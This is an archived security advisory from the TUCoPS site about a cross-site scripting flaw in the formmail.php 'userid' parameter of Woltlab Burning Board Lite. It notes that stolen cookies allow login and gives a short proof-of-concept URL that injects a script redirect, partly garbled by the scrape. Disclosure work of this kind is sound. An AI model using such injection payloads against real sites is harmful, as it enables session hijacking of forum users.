Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web BBS :: Frequently Exploited :: hack7278.htm

WBB Woltlab Burning Board Lite formmail.php XSS
Security Advisory: Woltlab Burning Board Lite formmail.php XSS

Advisory Information


Advisory name		:  Woltlab Burning Board Lite formmail.php XSS

Discovered by		:  drhankey /

Vendor Name		:  Woltlab

Vendor Homepage		: 

Software		:  Woltlab Burning Board Lite

Vulnerability Type	:  Cross-Site-Scripting

Vulnerable Versions	:  1.0.0, 1.0.1e, maybe more

Platforms		:  OS Independent, PHP

What is Woltlab Burning Board Lite?


Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,

a PHP based bulletin board

Vulnerability Description:


formmail.php outputs the "userid"-parameter unfiltered, so its possible to add arbitary Code to the output by using a malformed link.

The Board also allows logging in with stolen cookies.

Proof of Concept:


<script>document.lo">http://website/board/formmail.php?userid=1"><script>document.lo cation.href=""; x="y 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH